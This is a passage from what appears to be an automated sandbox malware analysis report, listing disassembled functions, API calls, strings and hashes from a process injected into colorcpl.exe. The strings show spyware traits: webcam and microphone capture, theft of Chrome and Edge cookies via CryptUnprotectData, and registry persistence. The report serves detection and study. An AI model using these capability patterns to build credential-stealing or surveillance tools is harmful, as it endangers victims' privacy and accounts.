                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 0507d54bdd386c22659145e6a6eae845797c743fd094d9a9eb9febc23918d464
                                                          • Instruction ID: a395ceee57c63f5b38fe8343fa3a7559c91a13d42489e60c7d7033a665151c92
                                                          • Opcode Fuzzy Hash: 0507d54bdd386c22659145e6a6eae845797c743fd094d9a9eb9febc23918d464
                                                          • Instruction Fuzzy Hash: 36F0BBB5D44300BFFF223B748D0A5AABF99AB02794F00091DEA9382661D9618850CF61
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab829546361a03fdc6b3388de326327632cd52c6c6396ffddc187682a0ea3cff
                                                          • Instruction ID: 882f89b562e12d04acf6f271e9426ba7dadb71b2a8ca46a1816cf9caee6e6e53
                                                          • Opcode Fuzzy Hash: ab829546361a03fdc6b3388de326327632cd52c6c6396ffddc187682a0ea3cff
                                                          • Instruction Fuzzy Hash: 1271C475E012169BDF219F95C884BBFBB7BEF463A4F1C0229E61967280D7709941CFA0
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,02F9D29D), ref: 02F944C4
                                                            • Part of subcall function 02F94607: __EH_prolog.LIBCMT ref: 02F9460C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                          • API String ID: 3469354165-3547787478
                                                          • Opcode ID: d34696ab805aaac32df8ca9a7f835ed15f9dc8b695e264a348c7fceeb829d1a0
                                                          • Instruction ID: 1f6370afe5efa09c5a6aa37a89fd969fe5ea66ba2a7749798f359aa8cc75a559
                                                          • Opcode Fuzzy Hash: d34696ab805aaac32df8ca9a7f835ed15f9dc8b695e264a348c7fceeb829d1a0
                                                          • Instruction Fuzzy Hash: 8351F371F042016BEE29FB749C18A6F3B5BAF957C4F000428EB0A57794EF349906CB92
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,02FEF244), ref: 02FD944F
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,03002764,000000FF,00000000,0000003F,00000000,?,?), ref: 02FD94C7
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,030027B8,000000FF,?,0000003F,00000000,?), ref: 02FD94F4
                                                          • _free.LIBCMT ref: 02FD943D
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FD9609
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: dfb067f21bf423470d7acacc8343f2221153580ecfdecc5c6866a3bd4a022509
                                                          • Instruction ID: ffbac3f1a3e70ac03d82d75e88f85bdf62a5d500cfbbf5d1ce4602f70e919d5f
                                                          • Opcode Fuzzy Hash: dfb067f21bf423470d7acacc8343f2221153580ecfdecc5c6866a3bd4a022509
                                                          • Instruction Fuzzy Hash: 6D510C71D002099FCB10EFF4DD849AEB7BEEF457A4F18066AD61897280D7B09941CF50
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,02FBDD92,?,?,?,00000001,00000000,?,00000001,02FBDD92,02FBDD92), ref: 02FE11F9
                                                          • __alloca_probe_16.LIBCMT ref: 02FE1231
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,02FBDD92,?,?,?,00000001,00000000,?,00000001,02FBDD92,02FBDD92,?), ref: 02FE1282
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,02FBDD92,02FBDD92,?,00000002,00000000), ref: 02FE1294
                                                          • __freea.LIBCMT ref: 02FE129D
                                                            • Part of subcall function 02FD61B8: RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: cc0f5dbaaae98cab5da34d9ab8523c1e75828f8666fe825093a85e098d59c059
                                                          • Instruction ID: 41be10aab5a4143a45f13c5e5bcdf8d729dafeedd5b5c85e1ecb7caee93c231f
                                                          • Opcode Fuzzy Hash: cc0f5dbaaae98cab5da34d9ab8523c1e75828f8666fe825093a85e098d59c059
                                                          • Instruction Fuzzy Hash: 4B31E372E0021A9BDF269F66DC40DAF7BA6EB40790F044528ED09D7290E735DC61CFA0
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02F91BF9
                                                          • waveInOpen.WINMM(03002AC0,000000FF,03002AA8,Function_00001D0B,00000000,00000000,00000024), ref: 02F91C8F
                                                          • waveInPrepareHeader.WINMM(03002A88,00000020), ref: 02F91CE3
                                                          • waveInAddBuffer.WINMM(03002A88,00000020), ref: 02F91CF2
                                                          • waveInStart.WINMM ref: 02F91CFE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID:
                                                          • API String ID: 1356121797-0
                                                          • Opcode ID: 88e574e461316c61e5d2b63aa0ef18527f61bcffddb6f0922d4bb13405dfb99e
                                                          • Instruction ID: 2a025efc26c0f57350fb20be621687c9d2b82cd4778f1ef608736857660e2bc4
                                                          • Opcode Fuzzy Hash: 88e574e461316c61e5d2b63aa0ef18527f61bcffddb6f0922d4bb13405dfb99e
                                                          • Instruction Fuzzy Hash: E8217F71A062019FDB25FF25E81C51A7BAEBF4A758F104C2AE209EB698DF7C0400CF25
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 02FDF3E3
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02FDF406
                                                            • Part of subcall function 02FD61B8: RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02FDF42C
                                                          • _free.LIBCMT ref: 02FDF43F
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02FDF44E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 8c50653bd774419c986ab593a55d71513eaf4a95c10a3ec43829d05f9b32db20
                                                          • Instruction ID: f82769e244c780195be0915021769f8ded31d2cab9430dd25d92bccf4f34ec95
                                                          • Opcode Fuzzy Hash: 8c50653bd774419c986ab593a55d71513eaf4a95c10a3ec43829d05f9b32db20
                                                          • Instruction Fuzzy Hash: 4D01DD72A012157F272215B6AD4CC7B79AFEEC7EE43580619FF05D7640DBA49D0285B0
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02FA11AB
                                                          • int.LIBCPMT ref: 02FA11BE
                                                            • Part of subcall function 02F9E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 02F9E10D
                                                            • Part of subcall function 02F9E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 02F9E127
                                                          • std::_Facet_Register.LIBCPMT ref: 02FA11FE
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02FA1207
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02FA1225
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID:
                                                          • API String ID: 2536120697-0
                                                          • Opcode ID: ca83ba06d83d12d54a2acbaf6e445ab678b29a169643e4c1d5b5ad50107a425a
                                                          • Instruction ID: 4eb41cc9c04bbbc0289e006a136de8f5905a44da0a93489cd3e0e8943abb01a0
                                                          • Opcode Fuzzy Hash: ca83ba06d83d12d54a2acbaf6e445ab678b29a169643e4c1d5b5ad50107a425a
                                                          • Instruction Fuzzy Hash: 9611E772900118A7DB14FBA4DC108DEBBAADF403E0F21055AEA14A7290DB71DE518F90
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,02FCBCD6,00000000,?,?,02FCBD5A,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02FD831E
                                                          • _free.LIBCMT ref: 02FD8353
                                                          • _free.LIBCMT ref: 02FD837A
                                                          • SetLastError.KERNEL32(00000000,?,02F9A756), ref: 02FD8387
                                                          • SetLastError.KERNEL32(00000000,?,02F9A756), ref: 02FD8390
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 8ad50262075dc026534b44bbf98cff36561bcf7b1f357e43c809bb2c007930cb
                                                          • Instruction ID: 08fcd711b42abe7f195652534dc76f0eb197b1bba5d92e62de3f2cfea14bfde9
                                                          • Opcode Fuzzy Hash: 8ad50262075dc026534b44bbf98cff36561bcf7b1f357e43c809bb2c007930cb
                                                          • Instruction Fuzzy Hash: A901F977A817006BD716B6356C44E6A322F9BC27F5B2D0924FB1CD6180EF7588078520
                                                          APIs
                                                          • _free.LIBCMT ref: 02FE0A54
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FE0A66
                                                          • _free.LIBCMT ref: 02FE0A78
                                                          • _free.LIBCMT ref: 02FE0A8A
                                                          • _free.LIBCMT ref: 02FE0A9C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: e2c91a40d946f11fec52baf1d9aed58168aeafd376a6c6d07e4f192bf3d80b8c
                                                          • Instruction ID: 5119e4418c7cb378ec73c3c4af35f8dcb80ca58b0636ed5bacc004b6c68fd461
                                                          • Opcode Fuzzy Hash: e2c91a40d946f11fec52baf1d9aed58168aeafd376a6c6d07e4f192bf3d80b8c
                                                          • Instruction Fuzzy Hash: AAF018769052046B8B19EB5CF4D1C5673EFAE04B957688C19F246E7544CF74F8804E54
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD4106
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FD4118
                                                          • _free.LIBCMT ref: 02FD412B
                                                          • _free.LIBCMT ref: 02FD413C
                                                          • _free.LIBCMT ref: 02FD414D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 9dfb397b161defc4292f782f85f567f839519538cecd26b1e194b17104a6699c
                                                          • Instruction ID: 6812144cd09b6c32a50469d9f33831d10e870bdc6bc9388233b0c4191c84c303
                                                          • Opcode Fuzzy Hash: 9dfb397b161defc4292f782f85f567f839519538cecd26b1e194b17104a6699c
                                                          • Instruction Fuzzy Hash: 42F090758431108F8721FF14BC0580577AFAF067B8B984806F104B2698CF7C4851AFC2
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02FA3AF7
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02FA3B26
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02FA3BC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]
                                                          • API String ID: 3554306468-4262303796
                                                          • Opcode ID: c0bf52ca672226a34f188c1f7befd4a6dfaa5833738b6f3c404113752eedfee4
                                                          • Instruction ID: aefae8343a560bfd624f1f4e6c39ecc90c8e92f5c3f1b843d4d4a17af2cd79e5
                                                          • Opcode Fuzzy Hash: c0bf52ca672226a34f188c1f7befd4a6dfaa5833738b6f3c404113752eedfee4
                                                          • Instruction Fuzzy Hash: C151207190011DAAEF11EBA5DC91EEFB77EBF14384F500065E605E6190EF706A49CFA1
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 02FDE7B8
                                                          • _free.LIBCMT ref: 02FDE8D5
                                                            • Part of subcall function 02FCBD68: IsProcessorFeaturePresent.KERNEL32(00000017,02FCBD3A,02F9A756,?,?,00000000,02F9A756,00000000,?,?,02FCBD5A,00000000,00000000,00000000,00000000,00000000), ref: 02FCBD6A
                                                            • Part of subcall function 02FCBD68: GetCurrentProcess.KERNEL32(C0000417,?,02F9A756), ref: 02FCBD8C
                                                            • Part of subcall function 02FCBD68: TerminateProcess.KERNEL32(00000000), ref: 02FCBD93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                          • Instruction ID: 679792aec6889857586dc56890cf44b696cea989b67574451a2273a5b2fcef9a
                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                          • Instruction Fuzzy Hash: AC518075E0021AAFDF14DFA8CC80AADBBB6EF48354F284169DA54EB340E7719A01CB50
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 02FD3515
                                                          • _free.LIBCMT ref: 02FD35E0
                                                          • _free.LIBCMT ref: 02FD35EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                          • API String ID: 2506810119-1707929182
                                                          • Opcode ID: cc390a9ac961217785f674509efafb5cde14564e2f9cc95928a5dfbd74bcb36b
                                                          • Instruction ID: 27b3cafa7aa24c95fe47efdecfe56968b469c59f9d67db268b4d6035243d6be3
                                                          • Opcode Fuzzy Hash: cc390a9ac961217785f674509efafb5cde14564e2f9cc95928a5dfbd74bcb36b
                                                          • Instruction Fuzzy Hash: 5731A8B1E01215AFDB21EB59DC84E9EBBFEDB85354F1840A6E70597300DB708A40CF51
                                                          APIs
                                                            • Part of subcall function 02F9C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02F9C594
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 02F9C727
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02F9C792
                                                          Strings
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 02F9C73F
                                                          • User Data\Default\Network\Cookies, xrefs: 02F9C70D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: c3d63a140d1a36ba28fb0204cab420a4806b6270e9b91fd1557de9b298b08205
                                                          • Instruction ID: b07d8fd6eaa8f816675aff6c5b0753dc20d2738b49b40cace39283c0dd2424da
                                                          • Opcode Fuzzy Hash: c3d63a140d1a36ba28fb0204cab420a4806b6270e9b91fd1557de9b298b08205
                                                          • Instruction Fuzzy Hash: 4A212E7190010E9AEF14FBA1DC55DEFBB7EAE543D5B40002AE706A3190EF60994ACEA0
                                                          APIs
                                                            • Part of subcall function 02F9C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02F9C531
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 02F9C658
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02F9C6C3
                                                          Strings
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 02F9C670
                                                          • User Data\Default\Network\Cookies, xrefs: 02F9C63E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: c466551ca507133a44442424df8100d033392665d8de72f3a03a1a0f54719b2c
                                                          • Instruction ID: c9308b665bccc747d0f21922498c3fd4d5578dc77b8826e67d770e64b44922e8
                                                          • Opcode Fuzzy Hash: c466551ca507133a44442424df8100d033392665d8de72f3a03a1a0f54719b2c
                                                          • Instruction Fuzzy Hash: A521217190010E9AEF14FBA5DC55DEFBB7EBE54395B40042AE706A3090EF60994ACEA0
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02F96ABD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F96AC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CryptUnprotectData$crypt32
                                                          • API String ID: 2574300362-2380590389
                                                          • Opcode ID: ee4184ffb9dbf22d5bf5a8a2eef11c0a698a96adfb06114a0359c23718a16e2f
                                                          • Instruction ID: f9fa969ef022cfd71af2adcca87f19079da93dda4af38c88bc957d994db7425c
                                                          • Opcode Fuzzy Hash: ee4184ffb9dbf22d5bf5a8a2eef11c0a698a96adfb06114a0359c23718a16e2f
                                                          • Instruction Fuzzy Hash: 2301D835E04206ABEF18CFADD9449AFBBBCEF49284F00456DEA55D3340EB709900C7A0
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02F95159), ref: 02F95173
                                                          • CloseHandle.KERNEL32(?), ref: 02F951CA
                                                          • SetEvent.KERNEL32(?), ref: 02F951D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: a865022ed34217475525793cefd4a696ab2f49886c340c94866ff2059249d1e2
                                                          • Instruction ID: f94c4912feab18240223e780bb76ee83877d3ed817cb90f9b7baf9562b462c89
                                                          • Opcode Fuzzy Hash: a865022ed34217475525793cefd4a696ab2f49886c340c94866ff2059249d1e2
                                                          • Instruction Fuzzy Hash: 3201DF75A81B40AFFF26BB35CC8546ABBE6AF00785744092DD79386A61DB60A440CF51
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02F9E86E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2005118841-1866435925
                                                          • Opcode ID: 99cc50376cb149a75e3b43c0eacdbfd40b224292f1083f7b1e70ce1311a49f3e
                                                          • Instruction ID: bede8a6649002712be2e468a0b0f7b20930c341a1900f65e687a09ccae142987
                                                          • Opcode Fuzzy Hash: 99cc50376cb149a75e3b43c0eacdbfd40b224292f1083f7b1e70ce1311a49f3e
                                                          • Instruction Fuzzy Hash: 7301D671E443087AFF54FBD4CC02FBDB35A6F10BC0F00845BAB1295581EF616645CA62
                                                          Strings
                                                          • C:\Windows\SysWOW64\colorcpl.exe, xrefs: 02F976FF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                          • API String ID: 0-1707929182
                                                          • Opcode ID: 6f5544d265726d0d24fadd115671b944ea0c846950035ab5e96d82eab88f0484
                                                          • Instruction ID: ed083c481fbf5cd0ce3930a66fb192eb805324986bc63271ab7b891f90e270f1
                                                          • Opcode Fuzzy Hash: 6f5544d265726d0d24fadd115671b944ea0c846950035ab5e96d82eab88f0484
                                                          • Instruction Fuzzy Hash: 78F0B4B0F62259DBFF19BB349D1C7B9769A9B853CAF400825F742CA294EB6548018F21
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,030052D8), ref: 02FA385A
                                                          • RegSetValueExW.ADVAPI32(030052D8,?,00000000,00000001,00000000,00000000,030052F0,?,02F9F85E,pth_unenc,030052D8), ref: 02FA3888
                                                          • RegCloseKey.ADVAPI32(030052D8,?,02F9F85E,pth_unenc,030052D8), ref: 02FA3893
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
